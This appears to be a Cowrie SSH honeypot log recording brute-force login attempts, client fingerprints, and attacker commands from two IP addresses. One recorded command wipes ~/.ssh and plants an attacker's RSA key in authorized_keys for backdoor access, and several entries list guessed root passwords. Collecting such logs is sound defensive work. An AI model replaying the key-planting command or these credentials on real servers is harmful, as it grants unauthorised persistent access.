{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:19:41.771124Z","src_ip":"212.227.125.160","session":"cbab7d5a6554"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:19:41.772207Z","src_ip":"212.227.125.160","session":"cbab7d5a6554"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48426,"dst_ip":"1.2.3.4","dst_port":22,"session":"21051f6a5d70","protocol":"ssh","message":"New connection: 212.227.235.229:48426 (1.2.3.4:22) [session: 21051f6a5d70]","sensor":"my-vps","timestamp":"2025-08-31T06:19:43.939411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:19:44.695154Z","src_ip":"212.227.235.229","session":"21051f6a5d70"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:19:44.696124Z","src_ip":"212.227.235.229","session":"21051f6a5d70"}
{"eventid":"cowrie.login.failed","username":"test4","password":"abc123","message":"login attempt [test4/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:19:50.223546Z","src_ip":"212.227.235.229","session":"21051f6a5d70"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:51.933306Z","src_ip":"212.227.235.229","session":"21051f6a5d70"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60196,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2af60d79813","protocol":"ssh","message":"New connection: 212.227.235.229:60196 (1.2.3.4:22) [session: d2af60d79813]","sensor":"my-vps","timestamp":"2025-08-31T06:19:54.712366Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:19:54.713039Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:19:54.995099Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.login.success","username":"root","password":"Wg.123345","message":"login attempt [root/Wg.123345] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:19:56.165020Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:19:57.181306Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:19:57.182022Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T06:19:57.182918Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:57.465961Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:19:58.051275Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.052076Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.336221Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.337275Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33214,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf769edaf830","protocol":"ssh","message":"New connection: 212.227.235.229:33214 (1.2.3.4:22) [session: cf769edaf830]","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.624505Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.625413Z","src_ip":"212.227.235.229","session":"cf769edaf830"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:19:58.919842Z","src_ip":"212.227.235.229","session":"cf769edaf830"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:00.139598Z","src_ip":"212.227.235.229","session":"cf769edaf830"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:01.436522Z","src_ip":"212.227.235.229","session":"cf769edaf830"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34290,"dst_ip":"1.2.3.4","dst_port":22,"session":"be05a26c51ad","protocol":"ssh","message":"New connection: 212.227.235.229:34290 (1.2.3.4:22) [session: be05a26c51ad]","sensor":"my-vps","timestamp":"2025-08-31T06:20:01.742784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:20:01.744037Z","src_ip":"212.227.235.229","session":"be05a26c51ad"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:20:02.045793Z","src_ip":"212.227.235.229","session":"be05a26c51ad"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:20:03.289408Z","src_ip":"212.227.235.229","session":"be05a26c51ad"}
{"eventid":"cowrie.session.closed","duration":"8.9","message":"Connection lost after 8.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:03.591331Z","src_ip":"212.227.235.229","session":"d2af60d79813"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:03.592255Z","src_ip":"212.227.235.229","session":"be05a26c51ad"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38280,"dst_ip":"1.2.3.4","dst_port":22,"session":"5ffd133c8ccd","protocol":"ssh","message":"New connection: 212.227.125.160:38280 (1.2.3.4:22) [session: 5ffd133c8ccd]","sensor":"my-vps","timestamp":"2025-08-31T06:20:04.445942Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:20:04.791516Z","src_ip":"212.227.235.229","session":"c774bbc6ed97"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:20:05.119201Z","src_ip":"212.227.125.160","session":"5ffd133c8ccd"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T06:20:05.119859Z","src_ip":"212.227.125.160","session":"5ffd133c8ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39063,"dst_ip":"1.2.3.4","dst_port":22,"session":"9c89e55be01a","protocol":"ssh","message":"New connection: 212.227.235.229:39063 (1.2.3.4:22) [session: 9c89e55be01a]","sensor":"my-vps","timestamp":"2025-08-31T06:20:05.654565Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-31T06:20:05.655690Z","src_ip":"212.227.235.229","session":"9c89e55be01a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-31T06:20:05.785016Z","src_ip":"212.227.235.229","session":"9c89e55be01a"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:06.383951Z","src_ip":"212.227.235.229","session":"9c89e55be01a"}
{"eventid":"cowrie.login.failed","username":"test4","password":"abc123","message":"login attempt [test4/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T06:20:07.243499Z","src_ip":"212.227.125.160","session":"5ffd133c8ccd"}
{"eventid":"cowrie.session.closed","duration":"1.9","message":"Connection lost after 1.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:07.514456Z","src_ip":"212.227.235.229","session":"9c89e55be01a"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T06:20:08.598728Z","src_ip":"212.227.125.160","session":"5ffd133c8ccd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53352,"dst_ip":"1.2.3.4","dst_port":22,"session":"09803d92e6c8","protocol":"ssh","message":"New connection: 212.227.235.229:53352 (1.2.3.4:22) [session: 09803d92e6c8]","sensor":"my-vps","timestamp":"2025-08-31T06:20:12.985476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T06:20:29.901147Z","src_ip":"212.227.235.229","session":"09803d92e6c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T06:20:29.903574Z","src_ip":"212.227.235.229","session":"09803d92e6c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33290,"dst_ip":"1.2.3.4","dst_port":22,"session":"95a94e2dd8ce","protocol":"ssh","message":"New connection: 212.227.235.229:33290 (1.2.3.4:22) [session: 95a94e2dd8ce]","sensor":"my-vps","timestamp":"2025-08-31T06:20:31.873849Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T06:20:31.876264Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T06:20:32.133951Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.login.success","username":"root","password":"fuckfuck","message":"login attempt [root/fuckfuck] succeeded","sensor":"my-vps","timestamp":"2025-08-31T06:20:33.164400Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T06:20:33.701753Z","src_ip":"212.227.235.229","session":"95a94e2dd8ce"}
